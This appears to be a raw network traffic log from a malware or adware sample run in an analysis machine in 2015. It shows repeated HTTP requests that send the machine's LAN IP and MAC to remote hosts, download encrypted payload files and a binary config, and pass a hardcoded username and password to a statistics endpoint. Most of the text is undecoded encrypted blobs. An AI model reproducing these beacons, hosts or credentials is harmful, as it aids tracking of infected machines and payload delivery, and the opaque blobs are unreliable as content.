nHI3CO5IFhWAsJctTmj IfiJj VnDiHf5btYxTcOw4HE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI Wu wwnN9cEhzQksPnBhMH CyxDZVRIYXFFpm0MAo6DgC2QRv2YTwIwT29XazHhXVrQwYd9QvPwQZJhMLtkxzc e3eegsVDHMnJuacViNEyUzNtsQ1NYTf8d27GQD/J9XGD4qYxi8vxIiixIcnCOyBlOFqr9ETxrT SBHjArMiqMiHMIxSfRWU4KPY5pTF7DF2xKszLM0SuU/GyPDEKip3LDGtIHKgAjlwGoaHXIorCjbMTazQ2ZSPlr5flXLXC5JH3rPV7VCE5C4Yz4h3K0AOlFthiN4cVI3AP3NdgUfwDLK6r5zh2O0mhQ43fNWIPwFNWXJyfQNpBOtYm ARi1SoBtib4BGLVKgG0V2AJJhDBVqEnSGpMq4o L6wxom51VeVbrDGibnVV5VlEmG8hVGu5ExNrNDZlI WuKOtlnCKi AJIKLreHt1XkxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrObdsagrdZm/E2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrmemWon5Q0qfE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvoEO8sXymTr y6jpxuwh2p u92whz 8tvE2s0NmUj5azE4dSQE6hF3aV6mEpZjZPV9cZRQclYDv0cRH5FzB75MxNrNDZlI WvqkpwmtYwEg/WqE7QcsrWWDxWdJSNxrGJ7Zm5VGZfamcTazQ2ZSPlrcLYj0lqrlCI/Rp3LuKWWWLGPOS2/c nLVhRzQsiYEo7E2s0NmUj5a qSnCa1jASDxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a5OX8lKKswkonGwm ElZZQzib/wxCcfowCJZYUINYVTz1wg5aryKKMjyVskrcu QLtkrK5piaVn9RyE0rmYnzCbUjapOQdShugPmV6dHZsIK5F58pVNTdf3jCmkkLn7p8wnDtqlaMSXs8lbJK3LvkC4dUkaCFQH4uN1W2huWLpgU
<<< skipped >>>
GET /txt/whitelist.txt?ver=3.180&uid=down123.0&lip=192.168.11.131&mac=000C298A8B37&p=0&b=0.0.0.0.0&md5=25AEE42B466DB1826F98A5F21A9A9C94 HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: ln.p2ptool.com
Connection: Close
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: Tengine/2.0.2
Date: Wed, 11 Nov 2015 11:15:56 GMT
Content-Type: text/plain
Content-Length: 3476
Last-Modified: Fri, 22 Nov 2013 08:41:51 GMT
Connection: close
ETag: "528f18cf-d94"
Accept-Ranges: bytes
/uOrJJOQ0bgY9jPW9p1UwzlabyskyS1ciztzZWKoyggyuwDxnQlnFOPszhAwXEvEP4Ro1Ye5GacBBM2ZDNbUU Fc3f8HO2qyXYpVEjVFoWD25ZqPJsCD8qOAB wgCXdRc0XuI/c7plLEOnja3WJ0VzSoUtOuytBo9YwHKaDQwFJ/phDpH1RmCT0PpVHeHte0bQ6FPVVO1cDEHLrc9hsubAeFdijjIAUPWLKAHfO1qSVWKjPB8v18PmI56rTDucF0jCYIsKUbX/gtuw1a 1n5bL6dhDiuNvG0kRhtox0AybwbErVMBK4XrK1obf LTAlyy77 sTZ3l0ESrpR2HHdxDEue6pcfMRhz0ZQahWmq8610CX29zZYVFy8H4hihJB2wjmGLCcv6NV ggd gsC/STce7Pnc19RuUC8HVCyN90N9Y87b4rbC PHFnT9tYDoFGmyyJgRwnmH04MROJDdJzbnxsJeuN tjovl57mS39 UIxrLwWibnt/RUpHPDIFivoP1rZPgoyGyE95m/oQtasAP8QFwrqal0MMZjhYDvG0wCByOT9AZLpjIdm4QwX2q1Z1EwLsRa/RJB4wvPvo42hN5l9kVaqbU rcG/IZZBR CayLrkJrly/6psVd4mRXOidYZdVeLWvHQjqVz0y6m VA2VnWwIEb3UeVG4pHbf1sFsTIRUyA8yri1qFQdgILxA C5RvEeLlw i9JjXOrCss4pbS7Gn3dTZPy7kD7aptBNwBZ8AXyqK1lu iWTl/ WkoR9Sj3yWf5MVOHoX0VXWWxQot2/8PHlSQzDVv 2De/01k1xpsCsqniIqyltVIso5nGBEpRygNWYEN9vdk1sZugGX007PYU1RmkDJowgiCqQE3Z S8bBaOD46ikCWqMp0G9E1AeswK2Fz55zwjKvkukxSlQ 11kwxCgKRMANZGEOBE5zuEAYr1tXJIAKEkCyHgSEhnCcSms7bXzTZ K xavSklFGxxJoPGgbM9ntFXfCfCSVEg/75DV2dtPnAVPulvRG6ad9b/psmHQ87Ydux5R4nebyiCGAe8dJXk ozRC7esRpe37G1KTy67ti3mGCfv3XaFfzEDCXAQJDXzydYGwzFbufHoC6Oba8MBykz0IRvTgoHtzTpc3irGlZlpVdPKLzftyFBXGFSCa8DGCYXvpqdbfgQF2RpFckUmT01I13SJamGR957aQ7zoWd2xRg0TSaLDSO1iVXspPs40FHsQj/U4VK wzXHEoiyLu19qAK1imxhLpQKlr3uOju wkOjTY2vzdHLI3adsBo8YTrxVZb9db1HdkTNRFco46wqEOgw2Ieq jeNXWMXndNju7gbC3N7/5twJIkqZFt6MP8 y28KrDOB/DYFOHqYtthS4UvBZQwGyAukrufTRbs3BENArT3eDtQ2sAZJu2SAkVick9vQughZJetuuHbPMUbUJifqAy131nC6fgdmPhUNapajXDdjBC1GNg7iHk7hQ/w3CkcoEtqSGlGA49EyNV7bwAGoVc7x/Xb8eCvC/nt4eeGsW
<<< skipped >>>
GET /txt/urlnav_20150922.txt?ver=3.180&uid=down123.0&lip=192.168.11.131&mac=000C298A8B37&p=0&b=0.0.0.0.0&md5=5FC91A5A977345D62B641C89CD1CE439 HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: ln.p2ptool.com
Connection: Close
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: Tengine/2.0.2
Date: Wed, 11 Nov 2015 11:15:30 GMT
Content-Type: text/plain
Content-Length: 111968
Last-Modified: Tue, 22 Sep 2015 02:26:44 GMT
Connection: close
ETag: "5600bc64-1b560"
Accept-Ranges: bytes
nHI3CO5IFhWAsJctTmj IfiJj VnDiHf5btYxTcOw4HE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI Wu7vg7o4OGLvAksPnBhMH CyxDZVRIYXFFpm0MAo6DgC2QRv2YTwIwT29XazHhXVrQwYd9QvPwQZJhMLtkxzc e3eegsVDHMnJX2G2Yw6VqVQ6FniCe06ZDVEnGhKZIy9GgiH6/wrMOvilrWtIoUgA8dl63vkFlYsv808n9xoPjKOkA0d9/AUDVLIWyJKGfQ30oQdaSw ooRKP3TITS70qtG23VOoAzU/dEk APRjAGee1kHoMkGXR442O5E7FXkFrE2s0NmUj5ay0C63Xri3dBEoYcUYdhA1na912G4GnwNPyGigPuwU4WnDUHq/HLA1JSzVcV7qGonkM3kaB6fPbglycn0DaQTrXm/H8aJaRsqeb8fxolpGypNTPeVZu3tFqtj4tOAGKUF sMaJudVXlW6wxom51VeVZRJhvIVRruRJIWa4B0YS20w3O2oa8Ns9uggHzpTR0yccTazQ2ZSPlrxNrNDZlI WvI/pOICuWZe8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrTPMmJn/9ziG LTy9adcaKIsYpk leK3vxNrNDZlI WtXEcfORTifCxn ZMaxjFZ75v2Ipn 4qo34DqKck/Lvt8TazQ2ZSPlrEkYhq4qBTrw/Rp3LuKWWWAJO4gv6AT3UO7thRRNagkrE2s0NmUj5a3C2I9Jaq5QixNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrGwk/Dns/Y08qL4WDoLD oQQoy6/oPEBqxo0 qZuAtWoPgJ yR1ZwZZREMMJf0vpc4SZ8ce zsmIwA6jAbzQgABzIbqI92FStTOY2Qoonvg2rVGp Dwvn3pFK8vui2f77PmI XJuiyzi0Zkkx56pL9K75Mk7A9r648UKKHO63ouLGnQi8l0bpnC5T0Yty5kQ4Ods4aXXBrdpBepmeh2dZe/TnDXSN51O5
<<< skipped >>>
GET /tongji.php?action=list&username=icafe8&password=icafe8123&ips=192.168.11.131&version=2.0.0.4 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: */*
Host: update.down123.net
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: text/html; charset=gb2312
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.3.6
Date: Wed, 11 Nov 2015 11:17:50 GMT
Content-Length: 1
1....
GET /deploy.php?ConFig=xz9 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: */*
Host: update.down123.net
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.3.6
Date: Wed, 11 Nov 2015 11:17:50 GMT
Content-Length: 2
9eHTTP/1.1 200 OK..Content-Type: text/html..Server: Microsoft-IIS/7.5..X-Powered-By: PHP/5.3.6..Date: Wed, 11 Nov 2015 11:17:50 GMT..Content-Length: 2..9e..
GET /txt/ndis500_201511062222.txt?ver=3.180&uid=down123.0&lip=192.168.11.131&mac=000C298A8B37&p=0&b=0.0.0.0.0&md5=54F3F83A085F1E98C35C0A722AB6E096 HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: ln.p2ptool.com
Connection: Close
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: Tengine/2.0.2
Date: Wed, 11 Nov 2015 11:15:41 GMT
Content-Type: text/plain
Content-Length: 433608
Last-Modified: Fri, 06 Nov 2015 14:22:14 GMT
Connection: close
ETag: "563cb796-69dc8"
Accept-Ranges: bytes
nHI3CO5IFhWAsJctTmj IfiJj VnDiHf5btYxTcOw4HE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WtCdFRaA9XVxQksPnBhMH CyxDZVRIYXFFpm0MAo6DgC2QRv2YTwIwT29XazHhXVrQwYd9QvPwQZJhMLtkxzc e3eegsVDHMnKaEKbhAp/JvZsvB8Nn4Io6syqgQ9/SDaBLyvdjThfOrxE3XJ re1nM L5TwwJP6H0pEUYmcRBmOceMRuqxVNkb7JwfEVu4XsUhcvwly vksMTazQ2ZSPlrxNrNDZlI WvE2s0NmUj5ay0C63Xri3dB0xVG2WOXvXn3YNPrA6SxfVvh3CJHt4bIKI0mNWJEoCFRjYnLeAoMjy5ye8miatn/lycn0DaQTrWJvgEYtUqAbYm ARi1SoBtPvK pACZjJd7NldsOW7Tl sMaJudVXlW6wxom51VeVZRJhvIVRruRMTazQ2ZSPlrbN9ymUhbHBOK3fYskZxLv8TazQ2ZSPlrxNrNDZlI WuRDnkI6xLTnMTazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrF1t0sbdoWZzE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrTPMmJn/9ziGb5WV0mXW AYsYpk leK3vxNrNDZlI WtXEcfORTifCxn ZMaxjFZ7qzIWGvSJ2G7O6XC5Y8YEKsTazQ2ZSPlrEkYhq4qBTrw/Rp3LuKWWWN0D6Bmr0kKeRSI7 4oAkizE2s0NmUj5a3C2I9Jaq5QixNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrGwk/Dns/Y08qL4WDoLD oW3yI nE 5Ft5gY56mj9A0om63bSlJ/0Oy6tRS5Dm3SiqSQMs7a n1G2cKNuElZSmmL5PfQjk3LmCUAzwPyKFymTuNpzKZ3D9LE13E7e3X22xoBkwrLDH iwt 0EC6c7IQTYRMkU0E7CDhDBtJFxElLm8XRdVeGS10qqLxRG/4nXI6Gb0tSXPVdrB8Cjc3Loba CrlOlo7Gz
<<< skipped >>>
GET /plus/config/down123.0.bin?ver=3.180&lip=192.168.11.131&mac=000C298A8B37 HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: plus.zzinfor.cn
Connection: Close
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Wed, 11 Nov 2015 11:18:03 GMT
Server: Tengine/2.0.3
Content-Type: application/octet-stream
Content-Length: 1549
Expires: Wed, 11 Nov 2015 11:18:03 GMT
Cache-Control: max-age=0
X-Via: 1.1 bl15:2 (Cdn Cache Server V2.0)
Connection: close
....<.......`-8...\.Q...V.i..`-*......................-................................................T.......................................................................................]...`..........a....a..<....h2zov."uu&e9".z-...B....WJB.E.MYNjDn..Bok"atvxvu(r.RY._Q.C2:/|lK.....k....p...0j...)...$...zV....................,.../p9*t?..'XVI.AoFGP..Y......WW]*|(:n.BUG82qyb...................`...`..._..Z.sE. d.....9....gO.....YV.ZM.".G>....P..5ng._......V..scJ..]..rfgw 4#='F.N5m;zr=o0\.....h...D...R..#.........-_.....D,.14#q>y)[t3#4=tQ.4............................................................j...........".4..0L....A.....U/w< >q`y(W.7..2jzU5...I}!{2&dNk$re, .;t>w*#h7rz4 #}w"p{WWAZ.t!4A5f:2=#\LG.......h....E..K......W.0...!......ER5'.W..C1)5dN ."2H4............................................................f.......T..:._...\.r*.........................3...H.UD8i..80}g=lp^..GL@.4( 4w! 9. zD0=$74a{>&y(92}D.S.....c...P(...v..P.Yr.U....".....................2...|lkz!$ME..&yjz3/he#. D...W.IFE.R6)Y._P\...d...A.)>.....q...`.!....7.&.Vz...Y.Y.....vuH..R.P...5q}LR{f%ybV< ...a?ud.I&'..]G.]so(%.t}34...^..)h<i..X....Nqm..../ty~n.... {:h.sl...L........&h..|@.V$7......Fw6b4$.;.W!.SIzw=;tb~1.3...`2}%&d..AJ^Fw1"..^.1=a^.D...IYT. Y..YF.J..\....(i]{.....X...`...F.S......h.4..B.....O...I'...2-.....................................................]...`U..)..oe..=..p...u.......,6R,(n].`,...<, :ad..RGf9*:so(%cM`.MIY[E.ZM,W:j;x2;*....5....{mqdV.].......%.. Fm..o...........UMZ..&<0dV.X.V..&
<<< skipped >>>
GET /txt/minie_20151111.txt?ver=3.180&uid=down123.0&lip=192.168.11.131&mac=000C298A8B37&p=0&b=0.0.0.0.0&md5=9F815C0051C483DA569169A49B602D2A HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: ln.p2ptool.com
Connection: Close
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: Tengine/2.0.2
Date: Wed, 11 Nov 2015 11:15:30 GMT
Content-Type: text/plain
Content-Length: 3681632
Last-Modified: Wed, 11 Nov 2015 06:37:41 GMT
Connection: close
ETag: "5642e235-382d60"
Accept-Ranges: bytes
nHI3CO5IFhWAsJctTmj IfiJj VnDiHf5btYxTcOw4HE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI Wu7vg7o4OGLvAksPnBhMH CyxDZVRIYXFFpm0MAo6DgC2QRv2YTwIwT29XazHhXVrQwYd9QvPwQZJhMLtkxzc e3eegsVDHMnK8LkCEjjVuY w9ubR7oMGJYDX66FKP95lKsnSGyzq37ryciPXfvjMPpcqzf2tJHexhfLNc fok6tpr37HNZkoDA9b8f9QQXkBG dX3CMR0/NFCP83aLsI5BiAzHCQ3JAlQ4FJlQ856TPZm3LkrIF6N30ifaKq p83E2s0NmUj5a X5Vy1wuSR9dWtS4hPXoQyM IdytADpRVo8JE43dQFFipIaFHMmto3ZU4PHim6WzGQ7DQYttXN9lycn0DaQTrWJvgEYtUqAbYm ARi1SoBt9qL31Z27Nj27cK3hD49V5esMaJudVXlW6wxom51VeVZRJhvIVRruRMTazQ2ZSPlrCvj4xkq/yU dGfvGf0Yne8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a94BsqzULTQfxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5ay2oS4kGYrQWxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlr6BDvLF8pk6 P0P g8Q5mb8w4icKoxcxNrNDZlI WsxOHUkBOoRd2lephKWY2T1ZZGE77pEw2mANord1TbnucTazQ2ZSPlr6pKcJrWMBIP1qhO0HLK1lmKAsO86F254kLg6MOgYGj/E2s0NmUj5a3C2I9Jaq5QiP0ady7illljiF3sq2aCnyzX0okfCmeuexNrNDZlI WvqkpwmtYwEg8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a9SIyelpSHqnq1q0Btc2nwSKz5eXbq 3w0SO47vccmRiCV8k2Qip9g2z6Qsnr5fEBHZURWDBkbGIFM2XpBtTMgGe6Uq978GK26oCTYylcPSYk0BRHzuKCIFn44m2tyaRZ1koSJZKpXd/OHf 9s28bCOsp5XACOqJfX5nhXmBTF9k
<<< skipped >>>
GET /txt/miniIE_150427.txt?ver=3.180&uid=down123.0&lip=192.168.11.131&mac=000C298A8B37&p=0&b=0.0.0.0.0&md5=29B2926F658D9D3DBBC270CEAEC775A6 HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: ln.p2ptool.com
Connection: Close
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: Tengine/2.0.2
Date: Wed, 11 Nov 2015 11:15:56 GMT
Content-Type: text/plain
Content-Length: 1594720
Last-Modified: Mon, 27 Apr 2015 08:27:28 GMT
Connection: close
ETag: "553df2f0-185560"
Accept-Ranges: bytes
nHI3CO5IFhWAsJctTmj IfiJj VnDiHf5btYxTcOw4HE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI Wvq/lGe PyKoQksPnBhMH CyxDZVRIYXFFpm0MAo6DgC2QRv2YTwIwT29XazHhXVrQwYd9QvPwQZJhMLtkxzc e3eegsVDHMnIwdeoQ/p3LZzBo/F8sBT14gU gqvqaR HsRQ0eMlj6jyfjxN Sljm4uxTQeIsstKIgXEZuNNwlSFWZ/Ocl6ajVqrL9FP48YRqiB3vEjm3LlLBj8CmI5HI0dvaAgvZkgrkgBNIKspJzspbEiSObNPaK3flTHHFmlFfE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WuxjdyElk00EWwpPpmkWxL592DT6wOksX0Rk/JftCpZs7/GFJwYdLxNbjVKk 3PqZ6J LJTSAQIz5cnJ9A2kE61ib4BGLVKgG2JvgEYtUqAbeDk35AUHl73tufks1XoWabrDGibnVV5VusMaJudVXlWUSYbyFUa7kTE2s0NmUj5ayjiTpfmIKRl2EZHKlVEuV3E2s0NmUj5a8TazQ2ZSPlr8q6ATLe0BDo1vFqnvbGZ3MTazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvTu7cpOA81gl3prqnwQ6ppxNrNDZlI WvE2s0NmUj5a gQ7yxfKZOvo8xQR0ILcHUY4PBMHSsLbMTazQ2ZSPlrMTh1JATqEXdpXqYSlmNk9QYrGSLdEvLVSBJ/sSRlK6PE2s0NmUj5a qSnCa1jASD9aoTtByytZaZMFVEBXlS//3riYRXWEIuxNrNDZlI WtwtiPSWquUIrkSjdIyYLDPA9nNBCdKOkm/hbVWe7aCN8TazQ2ZSPlr8/NtRTCxZ I/Rp3LuKWWWBOVAnZ1Gp5T936SD5tpBgXE2s0NmUj5a qSnCa1jASD 8BgGQTR5rXlvLiHdduaD uVnYBpGHdzxNrNDZlI WtlbVeP21o8lsTazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a n PLUdYAM7u6dY8N0fVQjTBg4AZJAmXzAWuIVAOwWVRWgwWG/PzhWCZHG4tjpXwY8EePoyNjE9bQuOOiksOFys92Mb990zgH 9dcpHTN4oJH82bDLsUnnb8xYIKL6268 iq1CD6QKcyoahwQZemE7qDQdPE4 6Ew1OPiQ9gr3A
<<< skipped >>>
GET /txt/app_20150618.txt?ver=3.180&uid=down123.0&lip=192.168.11.131&mac=000C298A8B37&p=0&b=0.0.0.0.0&md5=8097F137AC26A6567AB9ADCE590E5996 HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: ln.p2ptool.com
Connection: Close
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: Tengine/2.0.2
Date: Wed, 11 Nov 2015 11:15:48 GMT
Content-Type: text/plain
Content-Length: 2198880
Last-Modified: Thu, 18 Jun 2015 01:46:51 GMT
Connection: close
ETag: "5582230b-218d60"
Accept-Ranges: bytes
nHI3CO5IFhWAsJctTmj IfiJj VnDiHf5btYxTcOw4HE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI Wu wwnN9cEhzQksPnBhMH CyxDZVRIYXFFpm0MAo6DgC2QRv2YTwIwT29XazHhXVrQwYd9QvPwQZJhMLtkxzc e3eegsVDHMnL k7DvPs3WjXk7SpQ15d7jJanjjC84vAhwYDSjOYxjLntlYG xDPkOtcC9tO841wTXAMmIvkygIBtWwdDYF4q5XRI7ZGVRlWYksgPP6AN16z9g/z8gXEfKLrJrovlO7LE2s0NmUj5a8TazQ2ZSPlr5flXLXC5JH2opEaPJrOTroz4h3K0AOlF0xwWtDAuHIW wHOn1s4MYbXo/OU7PvgNsuRvGWEC5TiXJyfQNpBOtYm ARi1SoBtib4BGLVKgG3Cfiy1bVioF8cfi/GUwqfa6wxom51VeVbrDGibnVV5VlEmG8hVGu5ExNrNDZlI WsiuRd8jl1vezouKXPQhqxaxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvdYieTWj/98sTazQ2ZSPlr9t4Tl IHES7E2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvoEO8sXymTr9ayT1Lrtc3gKkE5OkoGqK/E2s0NmUj5azE4dSQE6hF3aV6mEpZjZPXF8/zuqkGzfJgvhj6kGQ08xNrNDZlI WvqkpwmtYwEg/WqE7QcsrWW8f8VESpL8m4dJnx/A/B6/8TazQ2ZSPlrcLYj0lqrlCI/Rp3LuKWWWJ3t6N9bK/kMm1FSikOKLpHE2s0NmUj5a qSnCa1jASDxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a5DV89XbEJ50B10OT1XCNS8KQo3SDfccki1K0oMuEGS FKNR1Tqt32KnQRoV7CxP OdSc2AQjQ4eTNulgi4jGACKspxO5/VLgi5B1WxoKLegzIDHLzyxyGKsgm6nQO23QwErsKmAX434bv0We9PqRZmUZ Y19 ufMHLyQ0YFPMVj
<<< skipped >>>
GET /txt/list666_20151104221146.txt?ver=3.180&uid=down123.0&lip=192.168.11.131&mac=000C298A8B37&p=0&b=0.0.0.0.0&md5=CE0BAC1422C834FD0E304C8696FEA341 HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: ln.p2ptool.com
Connection: Close
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: Tengine/2.0.2
Date: Wed, 11 Nov 2015 11:15:34 GMT
Content-Type: text/plain
Content-Length: 247176
Last-Modified: Wed, 04 Nov 2015 14:11:46 GMT
Connection: close
ETag: "563a1222-3c588"
Accept-Ranges: bytes
